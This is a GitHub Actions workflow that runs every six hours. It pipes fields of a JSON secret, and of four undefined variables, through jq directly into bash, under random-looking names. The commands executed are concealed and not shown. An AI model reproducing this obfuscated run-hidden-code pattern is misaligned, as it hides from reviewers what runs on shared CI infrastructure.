name: caoyukaiming

on:
  workflow_dispatch:
  schedule:
    - cron: '32 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caoyukaiming
        env:
          kp86438: ${{ secrets.kp86438 }}
        run: |
          echo $kp86438 | jq -r .vccwp227 | /bin/bash
          echo $ctke2792 | jq -r .wq751 | /bin/bash
          echo $nqxiv157 | jq -r .sxkn28749 | /bin/bash
          echo $nrmob1557 | jq -r .zal710 | /bin/bash
          echo $axr81 | jq -r .xplz90 | /bin/bash

